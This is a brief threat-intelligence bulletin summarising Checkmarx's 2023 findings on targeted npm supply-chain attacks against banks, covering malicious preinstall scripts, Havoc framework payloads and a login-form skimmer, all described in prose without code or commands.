Cyber Security Threat Summary:
“In the first half of 2023, Checkmarx researchers detected multiple open-source software supply chain attacks aimed at the banking sector. These attacks targeted specific components in web assets used by banks, according to the experts the attackers used advanced techniques” (Security Affairs, 2023). A threat actor leverage the NPM platform to upload malicious packages that included malicious objects upon installation.

Using fake LinkedIn profiles, the threat actors contacted victim employees. Each target had it’s own command and control server (C2), and experts notices that the contributor behind the malicious packages was using a LinkedIn profile page of an individual that was posing as an employee of the victim organization.

Two malicious npm packages were used in April of 2023, and included a preinstall script that was used to begin a multi-stage attack chain. First the script would look for system information, specifically the host operating system. Next it would download a second-stage malware from a remote server by connecting to an Azure CDN subdomain that included the name of the victim bank. The use of Azure’s CDN subdomains allows attackers to avoid detection and bypass traditional deny list methods.

The Havoc Framework was delivered as the second-stage payload. It provides the threat actor various post-exploitation capabilities similar to Cobalt Strike, Sliver, and Brute Ratel. Cobalt Strike is incredible popular among threat actors, especially ransomware operators. Cybercriminals have experimented with other tools like Sliver, Brute Ratel, and now the Havoc Framework as defenders are getting better at combating the Cobalt Strike threat.

Security Officer Comments:
Threat actors also targeted a different bank in February 2023. In this campaign, the threat actors uploaded a malicious npm package that contained a payload designed to blend into the website of the victim bank and lay dormant until prompted by the threat actors. “The payload revealed that the attacker had identified a unique element ID in the HTML of the login page and designed their code to latch onto a specific login form element, stealthily intercepting login data and then transmitting it to a remote location.” continues the report.

Suggested Correction(s):
The experts believe that the two attacks are not linked, the npm packages have been reported and subsequently removed. The names of these packages were not revealed. Checkmarx believes that we will observe a steady escalation in such kinds of targeted attacks, including on banks.

The report published by Checkmarx includes indicators of compromise (IoCs) for these attacks.

Link(s):
https://securityaffairs.com/148757/cyber-crime/supply-chain-attack-banking-sector.html
https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/